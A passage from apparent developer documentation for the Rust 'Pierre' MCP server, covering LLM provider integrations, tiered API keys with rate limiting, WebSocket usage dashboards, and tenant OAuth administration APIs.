"gemma2-9b-it",
];
/// Base URL for the Groq API (OpenAI-compatible)
const API_BASE_URL: &str = "https://api.groq.com/openai/v1";
}
Capabilities
#![allow(unused)]
fn main() {
#[async_trait]
impl LlmProvider for GroqProvider {
fn name(&self) -> &'static str {
"groq"
}
fn display_name(&self) -> &'static str {
"Groq (Llama/Mixtral)"
}
fn capabilities(&self) -> LlmCapabilities {
// Groq supports streaming, function calling, and system messages
// but does not support vision (yet)
LlmCapabilities::STREAMING
| LlmCapabilities::FUNCTION_CALLING
| LlmCapabilities::SYSTEM_MESSAGES
| LlmCapabilities::JSON_MODE
}
fn default_model(&self) -> &'static str {
DEFAULT_MODEL
}
fn available_models(&self) -> &'static [&'static str] {
AVAILABLE_MODELS
}
}
}
Gemini Provider Implementation
The Gemini provider supports full-featured capabilities including vision:
Source: src/llm/gemini.rs
Configuration
#![allow(unused)]
fn main() {
/// Environment variable for Gemini API key
const GEMINI_API_KEY_ENV: &str = "GEMINI_API_KEY";
/// Default model to use
const DEFAULT_MODEL: &str = "gemini-2.5-flash";
/// Available Gemini models
const AVAILABLE_MODELS: &[&str] = &[
"gemini-2.5-flash",
"gemini-2.0-flash-exp",
"gemini-1.5-pro",
"gemini-1.5-flash",
"gemini-1.0-pro",
];
/// Base URL for the Gemini API
const API_BASE_URL: &str = "https://generativelanguage.googleapis.com/v1beta";
}
System Message Handling
Gemini handles system messages differently, passing them through a separate system_instruction field rather than inline in the message list:
#![allow(unused)]
fn main() {
impl GeminiProvider {
/// Convert chat messages to Gemini format
fn convert_messages(messages: &[ChatMessage]) -> (Vec<GeminiContent>, Option<GeminiContent>) {
let mut contents = Vec::new();
let mut system_instruction = None;
for message in messages {
if message.role == MessageRole::System {
// Gemini uses separate system_instruction field
system_instruction = Some(GeminiContent {
role: None,
parts: vec![ContentPart::Text {
text: message.content.clone(),
}],
});
} else {
contents.push(GeminiContent {
role: Some(Self::convert_role(message.role).to_owned()),
parts: vec![ContentPart::Text {
text: message.content.clone(),
}],
});
}
}
(contents, system_instruction)
}
/// Convert our message role to Gemini's role format
const fn convert_role(role: MessageRole) -> &'static str {
match role {
MessageRole::System | MessageRole::User => "user",
MessageRole::Assistant => "model",
}
}
}
}
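The split performed by convert_messages can be exercised with a stripped-down sketch (simplified types only; the real GeminiContent carries roles and content parts):

```rust
/// Simplified model of the system/content split performed above.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
enum Role {
    System,
    User,
    Assistant,
}

/// Returns (non-system contents, optional system instruction),
/// mirroring the shape of `convert_messages`.
fn split_system(messages: &[(Role, &str)]) -> (Vec<String>, Option<String>) {
    let mut contents = Vec::new();
    let mut system_instruction = None;
    for (role, text) in messages {
        match role {
            // System messages are hoisted out of the conversation body.
            Role::System => system_instruction = Some((*text).to_owned()),
            Role::User | Role::Assistant => contents.push((*text).to_owned()),
        }
    }
    (contents, system_instruction)
}
```

Note that, as in the real code, a later system message overwrites an earlier one.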
Debug Implementation (API Key Redaction)
Never expose API keys in logs:
#![allow(unused)]
fn main() {
impl std::fmt::Debug for GeminiProvider {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
f.debug_struct("GeminiProvider")
.field("default_model", &self.default_model)
.field("api_key", &"[REDACTED]")
// Omit `client` field as HTTP clients are not useful to debug
.finish_non_exhaustive()
}
}
}
OpenAI-Compatible Provider (Local LLM)
The OpenAiCompatibleProvider enables integration with any OpenAI-compatible API, including local LLM servers.
Source: src/llm/openai_compatible.rs
Use Cases
- Privacy-first deployments: Run LLMs locally without sending data to cloud
- Cost optimization: Use local hardware instead of API credits
- Air-gapped environments: Deploy in networks without internet access
- Custom models: Use fine-tuned or specialized models
Configuration
#![allow(unused)]
fn main() {
/// Default base URL (Ollama)
const DEFAULT_BASE_URL: &str = "http://localhost:11434/v1";
/// Default model for local inference
const DEFAULT_MODEL: &str = "qwen2.5:14b-instruct";
/// Connection timeout for local servers (more lenient than cloud)
const CONNECT_TIMEOUT_SECS: u64 = 30;
/// Request timeout (local inference can be slower)
const REQUEST_TIMEOUT_SECS: u64 = 300;
}
Setup Examples
Ollama (default):
# Start Ollama server
ollama serve
# Pull a model
ollama pull qwen2.5:14b-instruct
# Configure Pierre
export PIERRE_LLM_PROVIDER=local
# Uses defaults: http://localhost:11434/v1 and qwen2.5:14b-instruct
vLLM:
# Start vLLM server
vllm serve meta-llama/Llama-3.1-8B-Instruct --api-key token-abc123
# Configure Pierre
export PIERRE_LLM_PROVIDER=local
export LOCAL_LLM_BASE_URL=http://localhost:8000/v1
export LOCAL_LLM_MODEL=meta-llama/Llama-3.1-8B-Instruct
export LOCAL_LLM_API_KEY=token-abc123
LocalAI:
# Start LocalAI with a model
docker run -p 8080:8080 localai/localai:latest
# Configure Pierre
export PIERRE_LLM_PROVIDER=local
export LOCAL_LLM_BASE_URL=http://localhost:8080/v1
export LOCAL_LLM_MODEL=gpt-3.5-turbo # LocalAI model name
Implementation
#![allow(unused)]
fn main() {
pub struct OpenAiCompatibleProvider {
client: Client,
base_url: String,
model: String,
api_key: Option<String>,
}
impl OpenAiCompatibleProvider {
/// Create provider from environment variables
pub fn from_env() -> Result<Self, AppError> {
let base_url = env::var(LOCAL_LLM_BASE_URL_ENV)
.unwrap_or_else(|_| DEFAULT_BASE_URL.to_owned());
let model = env::var(LOCAL_LLM_MODEL_ENV)
.unwrap_or_else(|_| DEFAULT_MODEL.to_owned());
let api_key = env::var(LOCAL_LLM_API_KEY_ENV).ok();
info!(
"Initializing OpenAI-compatible provider: base_url={}, model={}",
base_url, model
);
let client = Client::builder()
.connect_timeout(Duration::from_secs(CONNECT_TIMEOUT_SECS))
.timeout(Duration::from_secs(REQUEST_TIMEOUT_SECS))
.build()
.map_err(|e| AppError::internal(format!("HTTP client error: {e}")))?;
Ok(Self {
client,
base_url,
model,
api_key,
})
}
}
#[async_trait]
impl LlmProvider for OpenAiCompatibleProvider {
fn name(&self) -> &'static str {
"local"
}
fn display_name(&self) -> &'static str {
"Local LLM (OpenAI-compatible)"
}
fn capabilities(&self) -> LlmCapabilities {
// Local providers typically support all features (model-dependent)
LlmCapabilities::STREAMING
| LlmCapabilities::FUNCTION_CALLING
| LlmCapabilities::SYSTEM_MESSAGES
| LlmCapabilities::JSON_MODE
}
}
}
Streaming Support
The provider supports SSE streaming for real-time responses:
#![allow(unused)]
fn main() {
async fn complete_stream(&self, request: &ChatRequest) -> Result<ChatStream, AppError> {
let url = format!("{}/chat/completions", self.base_url);
let openai_request = self.build_request(request, true);
let response = self.client
.post(&url)
.json(&openai_request)
.send()
.await?;
// Parse SSE stream
let stream = response
.bytes_stream()
.map(|result| {
// Parse "data: {json}" SSE format
// Handle [DONE] marker
});
Ok(Box::pin(stream))
}
}
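The SSE parsing elided in the stream body comes down to classifying each line of the response. A simplified per-line sketch that treats the payload as an opaque string rather than deserializing it:

```rust
/// Result of scanning one SSE line from an OpenAI-compatible stream.
#[derive(Debug, PartialEq, Eq)]
enum SseEvent<'a> {
    /// A `data: {json}` payload to deserialize into a stream chunk.
    Data(&'a str),
    /// The `data: [DONE]` sentinel that terminates the stream.
    Done,
    /// Blank lines, comments, and other fields are skipped.
    Skip,
}

fn parse_sse_line(line: &str) -> SseEvent<'_> {
    match line.strip_prefix("data: ") {
        Some("[DONE]") => SseEvent::Done,
        Some(payload) => SseEvent::Data(payload),
        None => SseEvent::Skip,
    }
}
```

The real implementation additionally has to buffer partial lines, since a network chunk can end mid-line.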
Tool/Function Calling
All three providers support tool calling for structured interactions:
#![allow(unused)]
fn main() {
/// Complete a chat request with function calling support
pub async fn complete_with_tools(
&self,
request: &ChatRequest,
tools: Option<Vec<Tool>>,
) -> Result<ChatResponseWithTools, AppError> {
match self {
Self::Gemini(provider) => provider.complete_with_tools(request, tools).await,
Self::Groq(provider) => provider.complete_with_tools(request, tools).await,
Self::Local(provider) => provider.complete_with_tools(request, tools).await,
}
}
}
Tool Definition
#![allow(unused)]
fn main() {
/// Tool definition for function calling
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Tool {
pub function_declarations: Vec<FunctionDeclaration>,
}
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct FunctionDeclaration {
pub name: String,
pub description: String,
pub parameters: Option<serde_json::Value>,
}
}
Recipe Generation Integration
Pierre uses LLM providers for the “Combat des Chefs” recipe architecture:
LLM Clients (Claude, ChatGPT)
External LLM clients generate recipes themselves:
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ LLM Client │────▶│ Pierre MCP │────▶│ USDA │
│ (Claude) │ │ Server │ │ Database │
└──────────────┘ └──────────────┘ └──────────────┘
│ │ │
│ 1. get_recipe_ │ │
│ constraints │ │
│───────────────────▶│ │
│ │ │
│ 2. Returns macro │ │
│ targets, hints │ │
│◀───────────────────│ │
│ │ │
│ [LLM generates │ │
│ recipe locally] │ │
│ │ │
│ 3. validate_ │ │
│ recipe │ │
│───────────────────▶│ │
│ │ Lookup nutrition │
│ │───────────────────▶│
│ │◀───────────────────│
│ 4. Validation │ │
│ result + macros│ │
│◀───────────────────│ │
Non-LLM Clients
For clients without LLM capabilities, Pierre uses its internal LLM:
#![allow(unused)]
fn main() {
// The suggest_recipe tool uses Pierre's configured LLM
let provider = ChatProvider::from_env()?;
let recipe = generate_recipe_with_llm(&provider, constraints).await?;
}
Error Handling
All LLM operations use structured error types:
#![allow(unused)]
fn main() {
// Good: Structured errors
return Err(AppError::config(format!(
"{GROQ_API_KEY_ENV} environment variable not set"
)));
return Err(AppError::external_service(
"Groq",
format!("API error ({status}): {error_text}"),
));
return Err(AppError::internal("No content in response"));
// Bad: Never use anyhow! in production code
// return Err(anyhow!("API failed")); // FORBIDDEN
}
Testing LLM Providers
Tests are in tests/llm_test.rs (not in src/ per project conventions):
#![allow(unused)]
fn main() {
#[test]
fn test_capabilities_full_featured() {
let caps = LlmCapabilities::full_featured();
assert!(caps.supports_streaming());
assert!(caps.supports_function_calling());
assert!(caps.supports_vision());
assert!(caps.supports_json_mode());
assert!(caps.supports_system_messages());
}
#[test]
fn test_gemini_debug_redacts_api_key() {
let provider = GeminiProvider::new("super-secret-key");
let debug_output = format!("{provider:?}");
assert!(!debug_output.contains("super-secret-key"));
assert!(debug_output.contains("[REDACTED]"));
}
#[test]
fn test_chat_request_builder() {
let request = ChatRequest::new(vec![ChatMessage::user("Hello")])
.with_model("llama-3.3-70b-versatile")
.with_temperature(0.7)
.with_max_tokens(1000)
.with_streaming();
assert_eq!(request.model, Some("llama-3.3-70b-versatile".to_string()));
assert!(request.stream);
}
}
Run tests:
cargo test --test llm_test -- --nocapture
Adding a New Provider
To add a new LLM provider:
- Create the provider file (src/llm/my_provider.rs):
#![allow(unused)]
fn main() {
pub struct MyProvider {
api_key: String,
client: Client,
}
#[async_trait]
impl LlmProvider for MyProvider {
fn name(&self) -> &'static str { "myprovider" }
fn display_name(&self) -> &'static str { "My Provider" }
fn capabilities(&self) -> LlmCapabilities {
LlmCapabilities::STREAMING | LlmCapabilities::SYSTEM_MESSAGES
}
// ... implement all trait methods
}
}
- Export from mod.rs:
#![allow(unused)]
fn main() {
mod my_provider;
pub use my_provider::MyProvider;
}
- Add to ChatProvider enum in src/llm/provider.rs:
#![allow(unused)]
fn main() {
pub enum ChatProvider {
Gemini(GeminiProvider),
Groq(GroqProvider),
MyProvider(MyProvider), // Add variant
}
}
- Update environment config in src/config/environment.rs:
#![allow(unused)]
fn main() {
pub enum LlmProviderType {
Groq,
Gemini,
MyProvider, // Add variant
}
}
- Add tests in tests/llm_test.rs
Best Practices
- API Key Security: Always redact in Debug impls, never log
- Capability Checks: Query capabilities before using features
- Timeout Handling: Configure appropriate timeouts for HTTP clients
- Rate Limiting: Respect provider rate limits (Groq: 12K TPM on free tier)
- Error Context: Provide meaningful error messages
- Streaming: Prefer streaming for long responses
- Model Selection: Allow users to override default models
- Provider Selection: Use Groq for cost-effective inference, Gemini for vision
Summary
The LLM provider architecture provides:
- Runtime Selection: ChatProvider selects the provider from environment configuration
- Pluggable Design: Add providers without changing consumer code
- Capability Detection: Query features at runtime
- Type Safety: Structured messages and responses
- Streaming Support: SSE-based streaming responses
- Tool Calling: All three providers support function calling
- Recipe Integration: Powers the “Combat des Chefs” architecture
- Security: API key redaction built-in
See Also
- LLM Providers Reference
- Tools Reference - Recipe Management
- Chapter 17.5: Pluggable Provider Architecture
- Chapter 2: Error Handling
- Appendix H: Error Reference
Chapter 27: API Keys, Rate Limiting & Real-Time Dashboard
This chapter covers Pierre’s B2B API key system, the unified rate limiting engine, and the real-time usage dashboard with WebSocket updates. You’ll learn how API keys are modeled, how quotas and bursts are enforced, and how the dashboard surfaces this information to end users.
API Key Model & Tiers
Pierre exposes a B2B API via API keys that carry their own tier and quota metadata.
Source: src/api_keys.rs:19-75
#![allow(unused)]
fn main() {
/// API Key tiers with rate limits
#[non_exhaustive]
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
#[serde(rename_all = "lowercase")]
pub enum ApiKeyTier {
/// Trial tier - 1,000 requests/month, auto-expires in 14 days
Trial,
/// Starter tier - 10,000 requests/month
Starter,
/// Professional tier - 100,000 requests/month
Professional,
/// Enterprise tier - Unlimited requests
Enterprise,
}
impl ApiKeyTier {
/// Returns the monthly API request limit for this tier
#[must_use]
pub const fn monthly_limit(&self) -> Option<u32> {
match self {
Self::Trial => Some(TRIAL_MONTHLY_LIMIT),
Self::Starter => Some(STARTER_MONTHLY_LIMIT),
Self::Professional => Some(PROFESSIONAL_MONTHLY_LIMIT),
Self::Enterprise => None, // Unlimited
}
}
/// Returns the rate limit window duration in seconds
#[must_use]
pub const fn rate_limit_window(&self) -> u32 {
RATE_LIMIT_WINDOW_SECONDS // 30 days in seconds
}
/// Default expiration in days for trial keys
#[must_use]
pub const fn default_trial_days(&self) -> Option<i64> {
match self {
Self::Trial => Some(TRIAL_PERIOD_DAYS),
_ => None,
}
}
}
}
Tier semantics:
- Trial: 1,000 requests/month, auto-expires after TRIAL_PERIOD_DAYS.
- Starter: 10,000 requests/month (STARTER_MONTHLY_LIMIT).
- Professional: 100,000 requests/month (PROFESSIONAL_MONTHLY_LIMIT).
- Enterprise: Unlimited (monthly_limit() -> None).
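The constants behind monthly_limit() are elided above, but the tier list gives their values, so the mapping can be illustrated with a standalone sketch:

```rust
/// Standalone sketch of the tier-to-quota mapping described above.
#[derive(Debug, Clone, Copy)]
enum Tier {
    Trial,
    Starter,
    Professional,
    Enterprise,
}

/// Monthly request quota per tier; None means unlimited.
const fn monthly_limit(tier: Tier) -> Option<u32> {
    match tier {
        Tier::Trial => Some(1_000),
        Tier::Starter => Some(10_000),
        Tier::Professional => Some(100_000),
        Tier::Enterprise => None, // unlimited
    }
}
```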
API Key Structure
Each API key stores its hashed value, tier, and rate limiting parameters.
Source: src/api_keys.rs:77-121
#![allow(unused)]
fn main() {
/// API Key model
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ApiKey {
/// Unique identifier for the API key
pub id: String,
/// ID of the user who owns this key
pub user_id: Uuid,
/// Human-readable name for the key
pub name: String,
/// Visible prefix of the key for identification
pub key_prefix: String,
/// SHA-256 hash of the full key for verification
pub key_hash: String,
/// Optional description of the key's purpose
pub description: Option<String>,
/// Tier level determining rate limits
pub tier: ApiKeyTier,
/// Maximum requests allowed in the rate limit window
pub rate_limit_requests: u32,
/// Rate limit window duration in seconds
pub rate_limit_window_seconds: u32,
/// Whether the key is currently active
pub is_active: bool,
/// When the key was last used
pub last_used_at: Option<DateTime<Utc>>,
/// When the key expires (if set)
pub expires_at: Option<DateTime<Utc>>,
/// When the key was created
pub created_at: DateTime<Utc>,
}
}
Design choices:
- Hashed storage: Only the SHA-256 hash is stored (key_hash); the full key is returned once at creation.
- Prefix: key_prefix lets the dashboard identify which key made a request without revealing the whole key.
- Tier + limit: tier encodes the semantic tier (trial/starter/…), while rate_limit_requests stores the actual numeric limit for flexibility.
Unified Rate Limiting Engine
The unified rate limiting engine applies the same logic to both API keys and JWT-authenticated users.
Source: src/rate_limiting.rs:22-60
#![allow(unused)]
fn main() {
/// Rate limit information for any authentication method
#[derive(Debug, Clone, Serialize)]
pub struct UnifiedRateLimitInfo {
/// Whether the request is rate limited
pub is_rate_limited: bool,
/// Maximum requests allowed in the current period
pub limit: Option<u32>,
/// Remaining requests in the current period
pub remaining: Option<u32>,
/// When the current rate limit period resets
pub reset_at: Option<DateTime<Utc>>,
/// The tier associated with this rate limit
pub tier: String,
/// The authentication method used
pub auth_method: String,
}
}
Key idea: whether a request is authenticated via API key or JWT, the same rate limiting structure is used, so downstream code can render consistent responses, dashboard metrics, and WebSocket updates.
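A hedged sketch of how the limit, remaining, and is_rate_limited fields might be derived from a usage counter (the arithmetic is illustrative, not Pierre's actual enforcement code):

```rust
/// Illustrative computation of (is_rate_limited, remaining) from a
/// tier limit and the requests used so far in the current window.
fn rate_limit_status(limit: Option<u32>, used: u32) -> (bool, Option<u32>) {
    match limit {
        // Unlimited tiers (e.g. Enterprise) are never rate limited.
        None => (false, None),
        Some(max) => {
            // saturating_sub avoids underflow when usage exceeds the limit.
            let remaining = max.saturating_sub(used);
            (used >= max, Some(remaining))
        }
    }
}
```

Because the same shape is produced for API keys and JWT users, response headers and dashboard widgets can be rendered from one code path.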
Tenant-Level Limit Tiers
Tenants have their own rate limit tiers layered on top of key-level limits.
Source: src/rate_limiting.rs:62-116
#![allow(unused)]
fn main() {
/// Tenant-specific rate limit tier configuration
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct TenantRateLimitTier {
/// Base monthly request limit
pub monthly_limit: u32,
/// Requests per minute burst limit
pub burst_limit: u32,
/// Rate limit multiplier for this tenant (1.0 = normal, 2.0 = double)
pub multiplier: f32,
/// Whether tenant has unlimited requests
pub unlimited: bool,
/// Custom reset period in seconds (None = monthly)
pub custom_reset_period: Option<u64>,
}
impl TenantRateLimitTier {
/// Create tier configuration for starter tenants
#[must_use]
pub const fn starter() -> Self { /* ... */ }
/// Create tier configuration for professional tenants
#[must_use]
pub const fn professional() -> Self { /* ... */ }
/// Create tier configuration for enterprise tenants
#[must_use]
pub const fn enterprise() -> Self { /* ... */ }
/// Apply multiplier to get effective monthly limit
#[must_use]
pub fn effective_monthly_limit(&self) -> u32 {
if self.unlimited {
u32::MAX
} else {
(self.monthly_limit as f32 * self.multiplier) as u32
}
}
}
}
Patterns:
- Per-tenant limits: SaaS plans map to starter(), professional(), enterprise().
- Multipliers: multiplier allows custom boosts for specific tenants (e.g., 2× quota during migration).
- Unlimited: unlimited = true maps to a u32::MAX effective limit.
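The multiplier math above can be exercised in isolation. This sketch re-declares the relevant fields of TenantRateLimitTier so it runs standalone (the concrete limit values are illustrative, not Pierre's real tier constants):

```rust
// Trimmed-down TenantRateLimitTier: just the fields effective_monthly_limit needs.
struct TenantRateLimitTier {
    monthly_limit: u32,
    multiplier: f32,
    unlimited: bool,
}

impl TenantRateLimitTier {
    // Same logic as the source above: unlimited short-circuits, otherwise
    // the base limit is scaled by the tenant-specific multiplier.
    fn effective_monthly_limit(&self) -> u32 {
        if self.unlimited {
            u32::MAX
        } else {
            (self.monthly_limit as f32 * self.multiplier) as u32
        }
    }
}

fn main() {
    // A starter tenant temporarily boosted to 2x quota during a migration.
    let boosted = TenantRateLimitTier { monthly_limit: 10_000, multiplier: 2.0, unlimited: false };
    assert_eq!(boosted.effective_monthly_limit(), 20_000);

    // Enterprise tenants bypass the arithmetic entirely.
    let enterprise = TenantRateLimitTier { monthly_limit: 0, multiplier: 1.0, unlimited: true };
    assert_eq!(enterprise.effective_monthly_limit(), u32::MAX);
}
```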
WebSocket Real-Time Updates
The WebSocket subsystem streams API usage and rate limit status in real time to dashboards.
Source: src/websocket.rs:23-74
#![allow(unused)]
fn main() {
/// WebSocket message types for real-time communication
#[non_exhaustive]
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(tag = "type")]
pub enum WebSocketMessage {
/// Client authentication message
#[serde(rename = "auth")]
Authentication { token: String },
/// Subscribe to specific topics
#[serde(rename = "subscribe")]
Subscribe { topics: Vec<String> },
/// API key usage update notification
#[serde(rename = "usage_update")]
UsageUpdate {
api_key_id: String,
requests_today: u64,
requests_this_month: u64,
rate_limit_status: Value,
},
/// System-wide statistics update
#[serde(rename = "system_stats")]
SystemStats {
total_requests_today: u64,
total_requests_this_month: u64,
active_connections: usize,
},
/// Error message to client
#[serde(rename = "error")]
Error { message: String },
/// Success confirmation message
#[serde(rename = "success")]
Success { message: String },
}
}
Topics:
- usage_update: per-key usage and current UnifiedRateLimitInfo status.
- system_stats: aggregate metrics for all keys (e.g., for an admin dashboard).
- auth / subscribe: initial handshake; clients authenticate, then opt into topics.
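Concretely, a client session might exchange messages like these over the wire (one JSON object per frame; the type tags come from the serde attributes above, but all field values here are made up for illustration):

```json
{"type": "auth", "token": "<jwt-or-api-key>"}
{"type": "subscribe", "topics": ["usage_update", "system_stats"]}
{"type": "usage_update", "api_key_id": "pk_abc123", "requests_today": 412, "requests_this_month": 8250, "rate_limit_status": {"remaining": 1750, "tier": "starter"}}
```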
WebSocket Manager
The WebSocketManager coordinates authentication, subscriptions, and broadcast.
Source: src/websocket.rs:76-115
#![allow(unused)]
fn main() {
/// Manages WebSocket connections and message broadcasting
#[derive(Clone)]
pub struct WebSocketManager {
database: Arc<Database>,
auth_middleware: McpAuthMiddleware,
clients: Arc<RwLock<HashMap<Uuid, ClientConnection>>>,
broadcast_tx: broadcast::Sender<WebSocketMessage>,
}
impl WebSocketManager {
/// Creates a new WebSocket manager instance
#[must_use]
pub fn new(
database: Arc<Database>,
auth_manager: &Arc<AuthManager>,
jwks_manager: &Arc<crate::admin::jwks::JwksManager>,
rate_limit_config: crate::config::environment::RateLimitConfig,
) -> Self {
let (broadcast_tx, _) =
broadcast::channel(crate::constants::rate_limits::WEBSOCKET_CHANNEL_CAPACITY);
let auth_middleware = McpAuthMiddleware::new(
(**auth_manager).clone(),
database.clone(),
jwks_manager.clone(),
rate_limit_config,
);
Self {
database,
auth_middleware,
clients: Arc::new(RwLock::new(HashMap::new())),
broadcast_tx,
}
}
}
}
Flow:
- Client connects to the WebSocket endpoint and sends Authentication { token }.
- WebSocketManager verifies the token via McpAuthMiddleware.
- Client sends Subscribe { topics } (e.g., "usage_update", "system_stats").
- Server periodically pushes UsageUpdate and SystemStats messages.
Dashboard Overview & Analytics
The dashboard HTTP routes expose human-friendly analytics built on top of usage and rate limiting data.
Source: src/dashboard_routes.rs:16-73
#![allow(unused)]
fn main() {
/// Dashboard overview with key metrics and recent activity
#[derive(Debug, Serialize)]
pub struct DashboardOverview {
pub total_api_keys: u32,
pub active_api_keys: u32,
pub total_requests_today: u64,
pub total_requests_this_month: u64,
pub current_month_usage_by_tier: Vec<TierUsage>,
pub recent_activity: Vec<RecentActivity>,
}
/// Usage statistics for a specific tier
#[derive(Debug, Serialize)]
pub struct TierUsage {
pub tier: String,
pub key_count: u32,
pub total_requests: u64,
pub average_requests_per_key: f64,
}
/// Recent API activity entry
#[derive(Debug, Serialize)]
pub struct RecentActivity {
pub timestamp: chrono::DateTime<Utc>,
pub api_key_name: String,
pub tool_name: String,
pub status_code: i32,
pub response_time_ms: Option<i32>,
}
}
Additional structs like UsageAnalytics, UsageDataPoint, ToolUsage, RateLimitOverview, and RequestLog provide time series and per-tool breakdowns used by the frontend dashboard to render charts and tables.
How This Ties Into MCP Tools
From the MCP side, API key and rate limit status is surfaced via:
- WebSocket: Real-time updates for dashboards and observability tools.
- HTTP analytics routes: JSON endpoints consumed by the dashboard frontend.
- A2A / tools: Internal tools can introspect rate limit status when generating explanations (e.g., “you hit your trial quota”).
Typical workflow for a B2B integrator:
- Create an API key using the admin UI or REST route.
- Use the key as Authorization: Bearer <api_key> when calling Pierre MCP HTTP endpoints.
- Monitor usage via the dashboard or WebSocket feed.
- Upgrade tier (trial → starter → professional) to unlock higher quotas.
Key Takeaways
- API keys: Tiered API keys with hashed storage and explicit monthly limits enable safe B2B access.
- Unified rate limiting: UnifiedRateLimitInfo abstracts over API key vs JWT, ensuring consistent quota behavior.
- Tenant tiers: TenantRateLimitTier augments per-key limits with SaaS plan semantics.
- Real-time updates: WebSockets stream UsageUpdate and SystemStats messages for live dashboards.
- Dashboard models: DashboardOverview, UsageAnalytics, and related structs power the analytics UI.
- Observability: Combined HTTP + WebSocket surfaces make it easy to monitor usage, spot abuse, and tune quotas.
Chapter 28: Tenant Admin APIs & Fitness Configuration
This appendix explains Pierre’s tenant administration HTTP APIs and how tenant-scoped fitness configurations are managed. You’ll see how tenants, OAuth apps, and fitness configs are modeled and exposed via REST routes.
Tenant Management APIs
Tenants represent logical customers or organizations in the Pierre platform. The tenant routes provide CRUD-style operations for tenants and their OAuth settings.
Creating Tenants
Source: src/tenant_routes.rs:27-57
#![allow(unused)]
fn main() {
/// Request body for creating a new tenant
#[derive(Debug, Deserialize)]
pub struct CreateTenantRequest {
/// Display name for the tenant
pub name: String,
/// URL-safe slug identifier for the tenant
pub slug: String,
/// Optional custom domain for the tenant
pub domain: Option<String>,
/// Subscription plan (basic, pro, enterprise)
pub plan: Option<String>,
}
/// Response containing created tenant details
#[derive(Debug, Serialize)]
pub struct CreateTenantResponse {
pub tenant_id: String,
pub name: String,
pub slug: String,
pub domain: Option<String>,
pub created_at: String,
/// API endpoint URL for this tenant
pub api_endpoint: String,
}
}
Usage: an admin-facing HTTP route accepts CreateTenantRequest, persists the tenant, and returns CreateTenantResponse with a derived API endpoint URL (e.g., https://api.pierre.ai/t/{slug} or custom domain).
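For illustration, a CreateTenantRequest body might look like this (field names from the struct above; the tenant values themselves are made up):

```json
{
  "name": "Acme Fitness",
  "slug": "acme-fitness",
  "domain": null,
  "plan": "pro"
}
```

The response echoes these fields back alongside the server-generated tenant_id, created_at, and the derived api_endpoint URL.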
Listing Tenants
Source: src/tenant_routes.rs:59-84
#![allow(unused)]
fn main() {
/// Response containing list of tenants with pagination
#[derive(Debug, Serialize)]
pub struct TenantListResponse {
/// List of tenant summaries
pub tenants: Vec<TenantSummary>,
/// Total number of tenants
pub total_count: usize,
}
/// Summary information about a tenant
#[derive(Debug, Serialize)]
pub struct TenantSummary {
pub tenant_id: String,
pub name: String,
pub slug: String,
pub domain: Option<String>,
pub plan: String,
pub created_at: String,
/// List of configured OAuth providers
pub oauth_providers: Vec<String>,
}
}
The list endpoint returns lightweight TenantSummary objects, including which OAuth providers are currently configured for each tenant.
Tenant OAuth Credential Management
Per-tenant OAuth credentials allow each tenant to bring their own Strava/Fitbit apps instead of sharing a global client ID/secret.
Source: src/tenant_routes.rs:86-124
#![allow(unused)]
fn main() {
/// Request to configure OAuth provider credentials for a tenant
#[derive(Debug, Deserialize)]
pub struct ConfigureTenantOAuthRequest {
/// OAuth provider name (e.g., "strava", "fitbit")
pub provider: String,
/// OAuth client ID from provider
pub client_id: String,
/// OAuth client secret from provider
pub client_secret: String,
/// Redirect URI for OAuth callbacks
pub redirect_uri: String,
/// OAuth scopes to request
pub scopes: Vec<String>,
/// Optional daily rate limit
pub rate_limit_per_day: Option<u32>,
}
/// Response after configuring OAuth provider
#[derive(Debug, Serialize)]
pub struct ConfigureTenantOAuthResponse {
pub provider: String,
pub client_id: String,
pub redirect_uri: String,
pub scopes: Vec<String>,
pub configured_at: String,
}
}
Flow:
- Admin calls POST /api/tenants/{tenant_id}/oauth with ConfigureTenantOAuthRequest.
- Server validates the provider, encrypts client_secret, and stores TenantOAuthCredentials.
- Response returns non-sensitive fields (client ID, redirect URI, scopes, timestamp).
- Later, TenantOAuthManager (see Chapter 16) resolves tenant-specific credentials when performing provider OAuth flows.
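An illustrative request body for the first step (the Strava client values, callback URL, and scope strings are examples, not values from the Pierre codebase):

```json
{
  "provider": "strava",
  "client_id": "12345",
  "client_secret": "<secret-from-strava>",
  "redirect_uri": "https://api.pierre.ai/oauth/callback/strava",
  "scopes": ["read", "activity:read_all"],
  "rate_limit_per_day": 1000
}
```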
Listing Tenant OAuth Providers
Source: src/tenant_routes.rs:126-161
#![allow(unused)]
fn main() {
/// List of OAuth providers configured for a tenant
#[derive(Debug, Serialize)]
pub struct TenantOAuthListResponse {
/// Configured OAuth providers
pub providers: Vec<TenantOAuthProvider>,
}
/// OAuth provider configuration details
#[derive(Debug, Serialize)]
pub struct TenantOAuthProvider {
pub provider: String,
pub client_id: String,
pub redirect_uri: String,
pub scopes: Vec<String>,
pub configured_at: String,
pub enabled: bool,
}
}
This view powers an admin UI where operators can confirm which providers are active per tenant, rotate credentials, or temporarily disable a misconfigured provider.
OAuth App Registration for MCP Clients
Beyond provider OAuth, Pierre exposes an OAuth server (Chapter 15) for MCP clients themselves. Tenant routes provide a convenience wrapper to register OAuth apps.
Source: src/tenant_routes.rs:163-205
#![allow(unused)]
fn main() {
/// Request to register a new OAuth application
#[derive(Debug, Deserialize)]
pub struct RegisterOAuthAppRequest {
/// Application name
pub name: String,
/// Optional application description
pub description: Option<String>,
/// Allowed redirect URIs for OAuth callbacks
pub redirect_uris: Vec<String>,
/// Requested OAuth scopes (e.g., mcp:read, mcp:write, a2a:read)
pub scopes: Vec<String>,
/// Application type (desktop, web, mobile, server)
pub app_type: String,
}
/// Response containing registered OAuth application credentials
#[derive(Debug, Serialize)]
pub struct RegisterOAuthAppResponse {
pub client_id: String,
pub client_secret: String,
pub name: String,
pub app_type: String,
pub authorization_url: String,
pub token_url: String,
pub created_at: String,
}
}
Pattern: tenants can programmatically register OAuth clients to integrate their own MCP tooling with Pierre, receiving a client_id/client_secret and the relevant auth/token endpoints.
Fitness Configuration APIs
The fitness configuration routes expose tenant- and user-scoped configuration blobs used by the intelligence layer (e.g., thresholds, algorithm choices, personalized presets).
Models
Source: src/fitness_configuration_routes.rs:15-64
